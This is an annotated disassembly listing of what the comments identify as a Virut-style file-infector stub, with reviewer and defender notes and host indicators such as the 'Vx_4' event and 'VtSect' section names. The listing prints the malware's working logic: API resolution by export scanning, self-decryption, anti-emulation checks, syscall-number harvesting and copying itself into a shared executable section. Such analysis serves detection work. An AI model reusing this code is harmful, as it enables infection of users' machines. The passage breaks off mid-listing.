                dd 42DED969h, 0F62DFE82h, 0F82AEEB2h, 0E951D99Eh, 48DE71ADh
                dd 0C9056E05h, 0D905B98Dh, 9A7A19Dh, 394509EDh, 0AAD81FDh
                dd 0DB5591CDh, 3D28E1F9h, 5778FD09h, 358539BEh, 597DB114h
                dd 22E5211Dh, 0E4C51539h, 64441BF6h, 9995255Eh, 16C058B5h
                dd 0FDF71052h, 0CA0740BDh, 0F810568Bh, 66E8029Fh, 0AD34DEADh
                dd 0B11063A1h, 1A20h dup(0)
; ---------------------------------------------------------------------------
; Reviewer annotations on the stub that follows the data above. Statements
; about intent are inferences from this listing, not confirmed behaviour.
;
; `call $+5` / `mov eax, [esp]` reads back the address of the `cld` that
; follows the call, so every [eax+..] / [ebp+..] operand below is relative to
; wherever this code is actually loaded (position-independent addressing).
;
; Bit 400000h of the dword at [eax+29ABh] selects how ebx is obtained:
;   bit clear: ebx = the dword above the pushed address, i.e. whatever was on
;              top of the stack when the stub was entered;
;   bit set:   the pushed address is discarded, esi/edi are saved as well, and
;              ebx is loaded through a pointer derived from bytes stored at
;              [eax+29AFh] (a first byte of 0E8h selects the form at
;              loc_31431041).
; In both cases ebx is later treated as an address inside a loaded PE image.
; ebx/esi/edi are saved into the stub's own image, so this region has to be
; writable at run time.
                call $+5
                cld
                mov eax, [esp]                  ; eax = address of the cld above
                mov ecx, [eax+29ABh]            ; flag dword
                mov [eax+32F3h], ebx            ; save caller's ebx
                and ecx, 400000h
                mov ebx, [esp+4]                ; dword above the pushed address
                jz short loc_3143104D
                pop ecx                         ; drop the address pushed by call $+5
                mov [eax+32F7h], esi            ; save caller's esi
                mov cl, [eax+29AFh]             ; first of the stored bytes
                mov [eax+32FBh], edi            ; save caller's edi
                cmp cl, 0E8h                    ; 0E8h is the x86 `call rel32` opcode
                jz short loc_31431041
                mov ebx, [eax+29B1h]
                jmp short loc_3143104B
; ---------------------------------------------------------------------------

loc_31431041:                           ; CODE XREF: UPX2:31431037j
                mov ecx, [eax+29B0h]            ; dword following the stored 0E8h byte
                mov ebx, [ecx+ebx+2]            ; presumably the operand of an indirect jmp thunk - TODO confirm

loc_3143104B:                           ; CODE XREF: UPX2:3143103Fj
                mov ebx, [ebx]                  ; dereference the pointer slot

; From here ebp = (address of the cld) - 101005h; all [ebp+10xxxxh] operands
; are offsets into this code/data body.
; The dword at [esp+4] is lowered by 8E05h and used as the destination of a
; 0DBh-byte copy from [ebp+1039BCh]. The exit path at loc_314310F0 ends in
; `pop ebp` / `retn`, which returns through this same slot, so this looks like
; putting displaced bytes back and resuming there - TODO confirm.
loc_3143104D:                           ; CODE XREF: UPX2:3143101Fj
                push ebp
                mov ebp, eax
                sub dword ptr [esp+4], 8E05h
                sub ebp, 101005h
                mov edi, [esp+4]
                lea esi, [ebp+1039BCh]
                mov ecx, 0DBh
                rep movsb                       ; leaves ecx = 0
; SLDT stores the LDT selector into cx (upper half of ecx is already 0). A
; non-zero value skips the int 2Eh below. A non-zero LDT selector is a commonly
; cited tell for some virtualised or emulated environments, so this looks like
; an environment check - TODO confirm.
                sldt cx
                test ecx, ecx
                jnz short loc_3143107B
                or eax, 0FFFFFFFFh
; NOTE(review): IDA's auto-comment for this instruction ("DOS 2+ internal -
; EXECUTE COMMAND") comes from the DOS interrupt list and does not apply to a
; 32-bit PE. On NT-family Windows int 2Eh is the legacy system-service trap;
; here it is issued with eax = 0FFFFFFFFh. eax, ecx and edx are all reloaded
; before they are next read, so the result is unused on this path.
                int 2Eh

; Backwards search for a PE image base: ebx is rounded down to a 4 KiB boundary
; and lowered 100h bytes at a time until the dword at +4Eh equals 73696854h
; (ASCII "This") and the word at ebx+[ebx+3Ch] equals 4550h ("PE"). Offset 4Eh
; is where the DOS-stub text "This program cannot be run in DOS mode" usually
; begins in Microsoft-linked images. No exception handler is installed around
; these reads.
loc_3143107B:                           ; CODE XREF: UPX2:31431074j
                and ebx, 0FFFFF000h

loc_31431081:                           ; CODE XREF: UPX2:31431090j
                cmp dword ptr [ebx+4Eh], 73696854h  ; "This"
                jz short loc_31431092

loc_3143108A:                           ; CODE XREF: UPX2:3143109Fj
                sub ebx, 100h
                jnz short loc_31431081

loc_31431092:                           ; CODE XREF: UPX2:31431088j
                mov eax, ebx
                add eax, [ebx+3Ch]              ; + e_lfanew
                mov edx, [eax+78h]              ; export directory RVA (PE32 layout)
                cmp word ptr [eax], 4550h       ; "PE"
                jnz short loc_3143108A
; Export-name walk. Directory fields used: +18h NumberOfNames,
; +20h AddressOfNames, +24h AddressOfNameOrdinals, +1Ch AddressOfFunctions.
; Only bytes 2..3 ("tP") and 5..8 ("ocAd") of each name are compared, which
; fits "GetProcAddress". Defender note: APIs resolved this way never appear in
; the import table, so static triage has to rely on the embedded name strings.
                add edx, ebx
                mov esi, [edx+20h]
                mov ecx, [edx+18h]
                add esi, ebx
                push ecx                        ; keep NumberOfNames to derive the index later

loc_314310AC:                           ; CODE XREF: UPX2:loc_314310C0j
                lodsd
                add eax, ebx
                cmp word ptr [eax+2], 5074h     ; "tP"
                jnz short loc_314310C0
                cmp dword ptr [eax+5], 6441636Fh    ; "ocAd"
                jz short loc_314310C5

loc_314310C0:                           ; CODE XREF: UPX2:314310B5j
                loop loc_314310AC
                pop ecx
                jmp short loc_314310F0          ; no matching export: take the exit path
; ---------------------------------------------------------------------------

loc_314310C5:                           ; CODE XREF: UPX2:314310BEj
                sub [esp], ecx                  ; NumberOfNames - remaining = index of the match
                mov esi, [edx+24h]
                pop ecx
                add esi, ebx
                movzx eax, word ptr [esi+ecx*2] ; ordinal for that name
                mov edi, [edx+1Ch]
                add edi, ebx                    ; edi = export address table
                mov esi, [edi+eax*4]
                add esi, ebx                    ; esi = address of the matched export
; Calls the routine at ebp+101120h with eax = ebp+101137h (loc_31431137) and
; dx = the 16-bit value stored 19h bytes before it. That routine XORs 2879h
; bytes in place starting at eax. In this listing the bytes from loc_31431137
; onward already read as plaintext API names, so the dump was presumably taken
; after that pass - TODO confirm.
                lea eax, [ebp+101137h]
                lea ecx, [ebp+101120h]
                mov dx, [eax-19h]
                call ecx
                jmp short loc_31431137
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_3143117E

loc_314310F0:                           ; CODE XREF: UPX2:314310C3j
                                        ; sub_3143117E+10j ...
; Common exit path (body of the function chunk labelled loc_314310F0).
; If bit 400000h of the dword at [ebp+1039B0h] is set, five bytes stored at
; [ebp+1039B4h] are written to the address held in the stack slot [esp+arg_0]
; and ebx/edi/esi are reloaded from [ebp+1042F8h]/[ebp+104300h]/[ebp+1042FCh].
; Control then leaves through `pop ebp` / `retn`.
                mov eax, [ebp+1039B0h]
                and eax, 400000h
                jz short loc_3143111C
                lea esi, [ebp+1039B4h]
                lodsd
                mov edi, [esp+arg_0]
                stosd                           ; 4 bytes ...
                mov ebx, [ebp+1042F8h]
                movsb                           ; ... plus 1 = five bytes written
                mov edi, [ebp+104300h]
                mov esi, [ebp+1042FCh]

loc_3143111C:                           ; CODE XREF: sub_3143117E-83j
                pop ebp
                retn
; END OF FUNCTION CHUNK FOR sub_3143117E
; ---------------------------------------------------------------------------
; NOTE(review): `retn 53DDh` is probably not an instruction. The code before
; loc_31431137 reads a 16-bit value 19h bytes before that label and calls a
; routine 17h bytes before it (ebp+101120h). That places the value on the first
; two bytes of this "retn" and the routine entry on its third byte, 53h, which
; is the encoding of `push ebx`; that would pair with the `pop ebx` before the
; final `retn` below. Treat as data + `push ebx` - TODO confirm against the
; raw bytes.
                retn 53DDh              ; CODE XREF: sub_3143344B+2DFp
; ---------------------------------------------------------------------------
; In-place XOR pass over 2879h bytes starting at eax. dx is the running 16-bit
; value: each byte is XORed with dl, then dl is reduced by bl and the halves of
; both bx and dx are swapped, so the low and high key bytes alternate.
                mov ecx, 2879h                  ; byte count
                mov ebx, edx                    ; bx = copy of the initial 16-bit value

loc_31431128:                           ; CODE XREF: UPX2:31431133j
                xor [eax], dl
                sub dl, bl
                add eax, 1
                xchg bl, bh
                xchg dl, dh
                loop loc_31431128
                pop ebx
                retn
; ---------------------------------------------------------------------------
; Three call-over-string stubs follow. In each, the bytes between the `call`
; and its target are an inline NUL-terminated ASCII name that IDA decoded as
; instructions; the call only serves to push the address of that name. Read as
; text the three names are "CloseHandle", "CreateEventA" and "GetLastError".
; After the first two names the bytes 53h, FFh D6h decode as `push ebx` /
; `call esi` (IDA shows them as the tail of an `add` plus `setalc`), i.e. a call
; of the export held in esi with (ebx, name). The jump targets shown inside the
; string bytes are artefacts and not real control flow.

loc_31431137:                           ; CODE XREF: UPX2:314310EEj
                call near ptr loc_31431146+2    ; pushes address of "CloseHandle"
                inc ebx
                insb
                outsd
                jnb short near ptr loc_314311A3+3
                dec eax
                popa
                outsb
                db 64h
                insb

loc_31431146:                           ; CODE XREF: UPX2:loc_31431137p
                add gs:[ebx-1], dl
                setalc
                mov [ebp+103E52h], eax          ; pointer resolved for "CloseHandle"
                call near ptr loc_31431162+1    ; pushes address of "CreateEventA"
                inc ebx
                jb short loc_314311BE
                popa
                jz short near ptr loc_314311C0+1
                inc ebp
                jbe short near ptr loc_314311C0+4
                outsb
                jz short loc_314311A3

loc_31431162:                           ; CODE XREF: UPX2:31431151p
                add [ebx-1], dl
                setalc
                mov [ebp+103E56h], eax          ; pointer resolved for "CreateEventA"
                call sub_3143117E               ; pushes address of "GetLastError"
                inc edi
                db 65h
                jz short near ptr loc_314311C0+1
                popa
                jnb short near ptr loc_314311EA+2
                inc ebp
                jb short near ptr loc_314311EA+3
                outsd
                jb short $+2

; =============== S U B R O U T I N E =======================================
; sub_3143117E - main setup path (reviewer annotations, inferred from this
; listing only).
; On entry: [esp] = address of the inline "GetLastError" string, ebx = image
; base found by the caller, esi = export matched by the caller's name search,
; ebp = load-address delta.
; Visible flow:
;   1. resolve the third name into [ebp+103E5Ah];
;   2. sub_3143154F creates a named event; a zero return goes to the exit path;
;   3. the pointer in [ebp+103E5Ah] is called; a non-zero result (for example
;      "already exists") goes to loc_31431524, which closes the handle and
;      exits - the event works as a run-once marker;
;   4. resolve 20h names into the table at [ebp+103E6Ah];
;   5. branch on the top bit of the value returned through slot +40h of that
;      table: clear -> loc_314312E3, set -> the path that follows directly.
; The event handle pushed in step 3 stays on the stack and is the argument
; consumed by the call at loc_31431524.

sub_3143117E    proc near               ; CODE XREF: UPX2:3143116Cp

arg_0           = dword ptr  4

; FUNCTION CHUNK AT 314310F0 SIZE 0000002E BYTES
; FUNCTION CHUNK AT 31431524 SIZE 0000000B BYTES

                push ebx
                call esi                ; NOTE(review): IDA labels this "lstrcatA"; esi was
                                        ; set by the caller's "tP"/"ocAd" name match, which
                                        ; fits GetProcAddress - treat the label as an artefact
                mov [ebp+103E5Ah], eax          ; pointer resolved for "GetLastError"
                call sub_3143154F               ; create the named event 'Vx_4'
                test eax, eax
                jz loc_314310F0
                push eax                        ; event handle, left on the stack
                call dword ptr [ebp+103E5Ah]
                test eax, eax
                jnz loc_31431524

loc_314311A3:                           ; CODE XREF: UPX2:31431160j
                                        ; UPX2:3143113Fj
                cmp byte ptr [ebp+10152Fh], 1
                jnz short loc_314311C0
                push dword ptr [ebp+1042F8h]    ; the ebx value saved by the entry stub
                dec byte ptr [ebp+10152Fh]
                pop dword ptr [ebp+101588h]

loc_314311BE:                           ; CODE XREF: UPX2:31431157j
                jmp short loc_314311C7
; ---------------------------------------------------------------------------

loc_314311C0:                           ; CODE XREF: sub_3143117E+2Cj
                                        ; UPX2:3143115Aj ...
                and dword ptr [ebp+101588h], 0

loc_314311C7:                           ; CODE XREF: sub_3143117E:loc_314311BEj
                and dword ptr [ebp+101578h], 0
                and dword ptr [ebp+10157Ch], 0
                and dword ptr [ebp+101580h], 0
                push edi
                mov byte ptr [ebp+1012D4h], 1
                mov [ebp+103E5Eh], esi          ; keep the resolver pointer for sub_3143158C

; Resolve 20h names from the NUL-separated list at [ebp+1015F4h] (it starts
; with the "lstrlen" bytes shown further down) into dword slots starting at
; [ebp+103E6Ah]. A name that does not resolve leaves 0 in its slot.
loc_314311EA:                           ; CODE XREF: UPX2:31431176j
                                        ; UPX2:31431179j
                lea esi, [ebp+1015F4h]
                xor ecx, ecx
                lea edi, [ebp+103E6Ah]
                mov cl, 20h
                call sub_3143158C
                pop edi
                call dword ptr [ebp+103EAAh]    ; slot +40h = 17th name; reads as "GetVersion" in the list
                shr eax, 1Fh                    ; keep only the top bit of the result
                jz loc_314312E3
; Top bit set. This path takes the export at offset 14h of what edi presumably
; still holds (the export address table computed by the caller), keeps it in
; [ebp+103E62h] and later calls it with dword IDs 10003h, 10000h, 10001h and
; 1000Ah. That pattern resembles the Win9x VxDCall interface - TODO confirm.
                mov eax, [edi+14h]
                push 40h
                add eax, ebx
                push 8001000h                   ; includes 1000h; bit 8000000h is not a documented NT allocation type
                mov [ebp+103E62h], eax
                push 7318h
                push 0
                call dword ptr [ebp+103EE2h]    ; slot +78h = 31st name; reads as "VirtualAlloc"
                test eax, eax
                jz loc_31431524
; Copy 0CC6h dwords (3318h bytes) of this body from [ebp+101000h] into the new
; block, rebase ebp onto the copy and continue inside it at offset 101254h.
                xchg eax, edi
                lea esi, [ebp+101000h]
                mov ebp, edi
                mov ecx, 0CC6h
                sub ebp, 101000h
                lea edx, [ebp+101254h]
                rep movsd
                jmp edx
; ---------------------------------------------------------------------------
; Presumably the continuation reached through the `jmp edx` above, running in
; the relocated copy.
                sub esp, 20h
                mov edi, esp
                push 8
                xor eax, eax
                pop ecx
                lea edx, [ebp+101B3Dh]
                rep stosd                       ; zero a 20h-byte stack structure
                mov edi, esp
                mov [edi+10h], edx
                inc byte ptr [edi+1Ch]
                push edi
                push 10003h
                call dword ptr [ebp+103E62h]
                add esp, 20h
                test eax, eax
                jz loc_31431524
                xchg eax, edi
                push 0
                push 1
                push 80000400h
                push 10000h
                call dword ptr [ebp+103E62h]
                test eax, eax
                jz loc_31431524
                push 0
                push eax
                push 40000h
                push 0
                shr eax, 0Ch
                push edi
                push 1
                push eax
                push 10001h
                call dword ptr [ebp+103E62h]
                push 1000Ah
                call dword ptr [ebp+103E62h]
                call loc_314312D3
                jmp loc_31431524
; ---------------------------------------------------------------------------
; As listed, `push 0` / `pop ecx` / `jecxz` returns immediately. The loop body
; (a call through slot +6Ch, which reads as "Sleep", with argument 0Ah) only
; runs if the pushed immediate is changed at run time - TODO confirm.

loc_314312D3:                           ; CODE XREF: sub_3143117E+14Bp
                                        ; sub_3143117E+162j
                push 0
                pop ecx
                jecxz short locret_314312E2
                push 0Ah
                call dword ptr [ebp+103ED6h]
                jmp short loc_314312D3
; ---------------------------------------------------------------------------

locret_314312E2:                        ; CODE XREF: sub_3143117E+158j
                retn
; ---------------------------------------------------------------------------
; Top bit clear. Requires slot +18h (7th name, reads as
; "CreateToolhelp32Snapshot") to have resolved. The next call skips an inline
; string that reads "NTDLL"; the bytes after it (00h, then FFh 95h 9Eh 3Eh 10h
; 00h) decode as `call dword ptr [ebp+103E9Eh]`, slot +34h, which reads as
; "GetModuleHandleA". IDA ended the procedure inside that string, which is why
; "sub_3143117E endp" appears in the middle of it.

loc_314312E3:                           ; CODE XREF: sub_3143117E+8Bj
                cmp dword ptr [ebp+103E82h], 0
                jz loc_31431524
                call near ptr loc_314312FA+1
                dec esi
                push esp
                inc esp
                dec esp
                dec esp

loc_314312FA:                           ; CODE XREF: sub_3143117E+172p
                add bh, bh
sub_3143117E    endp ; sp-analysis failed

                xchg eax, ebp
                sahf
                db 3Eh
                adc [eax], al
; Resolve 0Eh names from the list at [ebp+1017CEh] against the module handle
; just returned (moved into ebx) into slots starting at [ebp+103EEAh]. The list
; bytes read as Nt* names followed by "RtlUnicodeStringToAnsiString"; the last
; slot ([ebp+103F1Eh]) must be non-zero to continue.
                lea esi, [ebp+1017CEh]
                xor ecx, ecx
                lea edi, [ebp+103EEAh]
                mov cl, 0Eh
                xchg eax, ebx
                call sub_3143158C
                cmp dword ptr [ebp+103F1Eh], 0
                jz loc_31431524
; For up to five of the resolved exports the dword at offset 1 is copied into
; fixed locations inside this body. If those export stubs begin with
; `mov eax, imm32`, that dword is the system-service number. By list position
; the slots read as NtCreateFile, NtOpenFile, NtCreateProcess,
; NtCreateProcessEx and NtCreateUserProcess; the last two are optional
; (jecxz skips the rest when a slot is empty) - TODO confirm.
                mov eax, [ebp+103EEEh]
                push dword ptr [eax+1]
                pop dword ptr [ebp+103907h]
                mov eax, [ebp+103F06h]
                push dword ptr [eax+1]
                pop dword ptr [ebp+103954h]
                mov eax, [ebp+103EF2h]
                push dword ptr [eax+1]
                pop dword ptr [ebp+10395Bh]
                mov ecx, [ebp+103EF6h]
                jecxz short loc_31431373
                push dword ptr [ecx+1]
                pop dword ptr [ebp+103968h]
                mov ecx, [ebp+103EFEh]
                jecxz short loc_31431373
                push dword ptr [ecx+1]
                pop dword ptr [ebp+103975h]

; Build, on the stack, the arguments for a named section object:
;   - sub_31431530 leaves a 0Ch-byte attribute block plus a 14h-byte descriptor
;     on the stack; [eax+4] is the descriptor pointer;
;   - a counted UTF-16 string is written at [ebp+103F74h] rounded up to a
;     4-byte boundary: Length = 2*19h-2, MaximumLength = 2*19h, Buffer = the
;     bytes right after the header; the 19h source bytes at [ebp+1015DBh] are
;     "\BaseNamedObjects\VtSect" plus its NUL, widened one byte per word (a
;     second copy goes to [ebp+103E20h]);
;   - the six pushes (18h, 0, name, 40h, descriptor, 0) have the shape of an
;     OBJECT_ATTRIBUTES record.
; Defender note: the section name is a host indicator that can be looked for
; in object/handle listings.
loc_31431373:                           ; CODE XREF: UPX2:31431357j
                                        ; UPX2:31431368j
                call sub_31431530
                lea edi, [ebp+103F74h]
                mov ecx, edi
                push 0
                neg cl
                push dword ptr [eax+4]
                and ecx, 3
                push 40h
                add edi, ecx
                push edi
                push 0
                push 18h
                lea esi, [ebp+1015DBh]
                mov ecx, 19h
                lea eax, ds:0FFFFFFFEh[ecx*2]
                stosw
                lea eax, ds:0[ecx*2]
                stosw
                lea eax, [edi+4]
                stosd
                xor ah, ah
                lea edx, [ebp+103E20h]

loc_314313BC:                           ; CODE XREF: UPX2:314313C5j
                lodsb
                mov [edx], ax
                stosw
                add edx, 2
                loop loc_314313BC
; Call through slot +10h (reads as "NtCreateSection"): out-handle pointer,
; access mask 0Eh, the attribute record, a size of 7318h, protection 40h,
; attribute 8000000h, no file handle. The returned status is not checked;
; only the handle slot is popped.
                mov edx, esp
                push 0
                push 7318h
                mov ecx, esp
                push 0
                mov eax, esp
                push 0
                push 8000000h
                push 40h
                push ecx
                push edx
                push 0Eh
                push eax
                call dword ptr [ebp+103EFAh]
                pop eax
                add esp, 40h                    ; drops the size pair, the 18h-byte record and the 20h bytes from sub_31431530
; Call through slot +18h (reads as "NtMapViewOfSection") for the current
; process (handle 0FFFFFFFFh), size 7318h, protection 40h. The mapped base is
; popped into edi; zero means failure.
                push 7318h
                mov edx, esp
                push 0
                mov ecx, esp
                push 40h
                push 0
                push 2
                push edx
                push 0
                push 7318h
                push 0
                push ecx
                push 0FFFFFFFFh
                push eax
                call dword ptr [ebp+103F02h]
                pop edi
                pop ecx
                test edi, edi
                jz loc_31431524
; Copy 0CC6h dwords of this body into the mapped view, rebase ebp onto the
; copy and continue inside it at offset 10143Ah.
                lea esi, [ebp+101000h]
                mov ecx, 0CC6h
                mov ebp, edi
                rep movsd
                sub ebp, 101000h
                lea eax, [ebp+10143Ah]
                jmp eax
; ---------------------------------------------------------------------------
; NOTE(review): the dw/dd values below follow the `jmp eax` directly and are
; most likely the code at offset 10143Ah that IDA left undecoded. ASCII visible
; in the little-endian dwords includes "SeDebugPrivilege" (44655300h,
; 67756265h, 76697250h, 67656C69h) and "csrs" (73727363h). Re-disassemble this
; range before drawing conclusions from it.
                dw 5450h
                dd 0FF6A206Ah, 3F0A95FFh, 0C0850010h, 0E834755Fh, 14Fh
                dd 11E8h, 44655300h, 67756265h, 76697250h, 67656C69h, 0E8570065h
                dd 550h, 4278B5FFh, 95FF0010h, 103E8Eh, 5295FF57h, 6A00103Eh
                dd 0FF026A00h, 103E8295h, 128B900h, 2B970000h, 240C89E1h
                dd 95FF5754h, 103EC6h, 0A583F633h, 103F62h, 0FF575400h
                dd 103ECA95h, 74C08500h, 0FE834666h, 0FFEE7204h, 6A082474h
                dd 0FF2A6A00h, 103EC295h, 74C08500h, 88E893DCh, 33000005h
                dd 3AE391C9h, 3F628539h, 32750010h, 24247C81h, 73727363h
                dd 0C1812874h, 0E9Fh, 56505450h, 53505051h, 3E7A95FFh
                dd 0C0850010h, 0FF0F7459h, 8F082474h, 103F6285h, 0FDC5E800h
                dd 0FF53FFFFh, 103E5295h, 818EEB00h, 128C4h, 95FF5700h
                dd 103E52h
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_3143117E
; Failure/cleanup exit: calls the pointer resolved for "CloseHandle" on the
; dword at the top of the stack (the event handle pushed in sub_3143117E) and
; joins the common exit path.

loc_31431524:                           ; CODE XREF: sub_3143117E+1Fj
                                        ; sub_3143117E+B2j ...
                call dword ptr [ebp+103E52h]
                jmp loc_314310F0
; END OF FUNCTION CHUNK FOR sub_3143117E
; ---------------------------------------------------------------------------
                align 10h

; =============== S U B R O U T I N E =======================================
; sub_31431530 - builds two records on the caller's stack and returns with
; `jmp edx`, so the 20h bytes it pushes stay on the stack for the caller to
; remove.
;   lower record (eax on return): 0Ch, pointer to upper record, 0
;   upper record: 40001h followed by four zero dwords
; The layout matches a SECURITY_ATTRIBUTES block pointing at an absolute
; security descriptor with revision 1, control 0004h (DACL present) and a NULL
; DACL pointer, i.e. an object with no access restrictions - TODO confirm.
; Out: eax = address of the lower record. Clobbers edx.

sub_31431530    proc near               ; CODE XREF: UPX2:loc_31431373p
                                        ; sub_3143154F+2p
                pop edx                         ; return address, used by the jmp below
                push 0
                push 0
                push 0
                push 0
                push 40001h
                mov eax, esp
                push 0
                push eax
                push 0Ch
                mov eax, esp
                jmp edx
sub_31431530    endp

; ---------------------------------------------------------------------------
; Event name used by sub_3143154F. Defender note: together with the section
; name "\BaseNamedObjects\VtSect" this is a host indicator. Both names coincide
; with markers publicly reported for the Virut file-infector family - verify
; against the sample hash before relying on that attribution.
aVx_4           db 'Vx_4',0
                db 0

; =============== S U B R O U T I N E =======================================
; sub_3143154F - calls the pointer resolved for "CreateEventA" with the
; attribute block from sub_31431530, two zero flags and the name at
; [ebp+101549h] ('Vx_4'), then removes the 20h bytes sub_31431530 left on the
; stack.
; Out: eax = result of that call (0 on failure).

sub_3143154F    proc near               ; CODE XREF: sub_3143117E+9p
                xor ecx, ecx
                call sub_31431530
                lea edx, [ebp+101549h]
                push edx                        ; name
                push ecx                        ; 0
                push ecx                        ; 0
                push eax                        ; attribute block
                call dword ptr [ebp+103E56h]
                add esp, 20h
                retn
sub_3143154F    endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; Data dwords. 3318h equals 4 * 0CC6h, the dword count used by both body
; copies above; the meaning of the other values is not visible here.
                align 4
                dd 585858h, 3318h, 0E63h, 1, 2 dup(0)
                dd 29B0h, 0

; =============== S U B R O U T I N E =======================================
; sub_3143158C - bulk name resolver.
; In:  ebx = module handle, esi = NUL-separated list of ASCII names,
;      edi = output array of dwords, ecx = number of names,
;      [ebp+103E5Eh] = resolver pointer stored by sub_3143117E.
; For each name: call the resolver with (ebx, esi), store the result at [edi],
; advance esi past the terminating NUL. Results are stored unchecked.
; `loop sub_3143158C` jumps back to the procedure start to re-push the counter.

sub_3143158C    proc near               ; CODE XREF: sub_3143117E+7Cp
                                        ; UPX2:31431312p ...
                push ecx
                push esi
                push ebx
                call dword ptr [ebp+103E5Eh]
                stosd
                pop ecx

loc_31431597:                           ; CODE XREF: sub_3143158C+Ej
                lodsb
                test al, al
                jnz short loc_31431597
                loop sub_3143158C
                retn
sub_3143158C    endp

; =============== S U B R O U T I N E =======================================
; sub_3143159F - calls slot +4Ch of the first pointer table (20th name, reads
; as "LoadLibraryA") on the string at [ebp+101975h] and stores the result in
; [ebp+104278h]. It then uses a call-over-string stub whose inline text reads
; "LookupPrivilegeValueA"; the bytes after it (00h, 50h, FFh 95h 5Eh 3Eh 10h
; 00h) decode as `push eax` / `call dword ptr [ebp+103E5Eh]`, and the result is
; stored in [ebp+10427Ch].
; NOTE(review): the two "FUNCTION CHUNK" ranges IDA attached to this procedure
; come from jump operands inside that inline string. The first chunk, starting
; at 31431629, begins where the byte table below stops after "CreateProcessA",
; so its opening bytes look like more of the same NUL-separated name list
; rather than code - TODO confirm.

sub_3143159F    proc near               ; CODE XREF: sub_3143311D+25p

; FUNCTION CHUNK AT 31431629 SIZE 000003C0 BYTES
; FUNCTION CHUNK AT 314319F9 SIZE 00000027 BYTES

                lea edx, [ebp+101975h]
                push edx
                call dword ptr [ebp+103EB6h]
                mov [ebp+104278h], eax
                call near ptr loc_314315CC+1    ; pushes address of "LookupPrivilegeValueA"
                dec esp
                outsd
                outsd
                imul esi, [ebp+70h], 50h
                jb short loc_31431629
                jbe short near ptr loc_31431629+2
                insb
                db 65h, 67h, 65h
                push esi
                popa
                insb
                jnz short loc_31431630
                inc ecx

loc_314315CC:                           ; CODE XREF: sub_3143159F+13p
                add [eax-1], dl
sub_3143159F    endp ; sp-analysis failed

                xchg eax, ebp
                pop esi
                db 3Eh
                adc [eax], al
                mov [ebp+10427Ch], eax
                retn
; ---------------------------------------------------------------------------
; String data: "\BaseNamedObjects\VtSect",0 (the 19h bytes read at
; [ebp+1015DBh]), then the start of the name list read at [ebp+1015F4h]:
; "lstrlen", "CreateFileA", "CreateFileMappingA", "CreateProcessA", ...
                db  5Ch ; \
                db  42h ; B
                db  61h ; a
                db  73h ; s
                db  65h ; e
                db  4Eh ; N
                db  61h ; a
                db  6Dh ; m
                db  65h ; e
                db  64h ; d
                db  4Fh ; O
                db  62h ; b
                db  6Ah ; j
                db  65h ; e
                db  63h ; c
                db  74h ; t
                db  73h ; s
                db  5Ch ; \
                db  56h ; V
                db  74h ; t
                db  53h ; S
                db  65h ; e
                db  63h ; c
                db  74h ; t
                db 0
                db  6Ch ; l
                db  73h ; s
                db  74h ; t
                db  72h ; r
                db  6Ch ; l
                db  65h ; e
                db  6Eh ; n
                db 0
                db  43h ; C
                db  72h ; r
                db  65h ; e
                db  61h ; a
                db  74h ; t
                db  65h ; e
                db  46h ; F
                db  69h ; i
                db  6Ch ; l
                db  65h ; e
                db  41h ; A
                db 0
                db  43h ; C
                db  72h ; r
                db  65h ; e
                db  61h ; a
                db  74h ; t
                db  65h ; e
                db  46h ; F
                db  69h ; i
                db  6Ch ; l
                db  65h ; e
                db  4Dh ; M
                db  61h ; a
                db  70h ; p
                db  70h ; p
                db  69h ; i
                db  6Eh ; n
                db  67h ; g
                db  41h ; A
                db 0
                db  43h ; C
                db  72h ; r
                db  65h ; e
                db  61h ; a
                db  74h ; t
                db  65h ; e
                db  50h ; P
                db  72h ; r
                db  6Fh ; o
                db  63h ; c
                db  65h ; e
                db  73h ; s
                db  73h ; s
                db  41h ; A
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_3143159F

loc_31431629:                           ; CODE XREF: sub_3143159F+1Fj
                                        ; sub_3143159F+21j
                add [ebx+72h], al
                db
65h popa jz short near ptr loc_31431693+2 loc_31431630: ; CODE XREF: sub_3143159F+2Aj push edx db 65h insd outsd jz short loc_3143169B push esp push 64616572h add [ebx+72h], al db 65h popa jz short near ptr loc_314316A6+2 push esp push 64616572h add [ebx+72h], al db 65h popa jz short near ptr loc_314316B2+3 push esp outsd outsd insb push 33706C65h xor dl, [ebx+6Eh] popa jo short near ptr loc_314316D1+1 push 4500746Fh js short loc_314316CF jz short near ptr loc_314316BB+1 push 64616572h add [esi+69h], al insb db 65h push esp imul ebp, [ebp+65h], 79536F54h jnb short loc_314316F0 db 65h insd push esp imul ebp, [ebp+65h], 65724600h db 65h dec esp imul esp, [edx+72h], 797261h inc edi db 65h jz short near ptr loc_314316D3+6 loc_31431693: ; CODE XREF: sub_3143159F+8Fj imul ebp, [ebp+41h], 69727474h loc_3143169B: ; CODE XREF: sub_3143159F+95j bound esi, [ebp+74h] db 65h jnb short loc_314316E2 add [edi+65h], al jz short near ptr loc_314316EB+1 loc_314316A6: ; CODE XREF: sub_3143159F+A2j imul ebp, [ebp+53h], 657A69h inc edi db 65h jz short loc_314316F8 loc_314316B2: ; CODE XREF: sub_3143159F+AFj imul ebp, [ebp+54h], 656D69h inc edi loc_314316BB: ; CODE XREF: sub_3143159F+C7j db 65h jz short near ptr loc_3143170A+1 outsd db 64h jnz short near ptr loc_31431729+5 db 65h dec eax popa outsb db 64h insb db 65h inc ecx add [edi+65h], al jz short near ptr loc_3143171D+6 loc_314316CF: ; CODE XREF: sub_3143159F+C5j db 65h insd loc_314316D1: ; CODE XREF: sub_3143159F+BEj jo short near ptr loc_31431717+2 loc_314316D3: ; CODE XREF: sub_3143159F+F1j imul ebp, [ebp+4Eh], 41656D61h add [edi+65h], al jz short near ptr loc_31431731+3 db 65h insd loc_314316E2: ; CODE XREF: sub_3143159F+FFj jo short near ptr loc_31431731+3 popa jz short near ptr loc_3143174E+1 inc ecx add [edi+65h], al loc_314316EB: ; CODE XREF: sub_3143159F+105j jz short loc_31431743 db 65h jb short near ptr loc_31431762+1 loc_314316F0: ; CODE XREF: sub_3143159F+DBj imul ebp, [edi+6Eh], 74654700h push esi loc_314316F8: ; CODE 
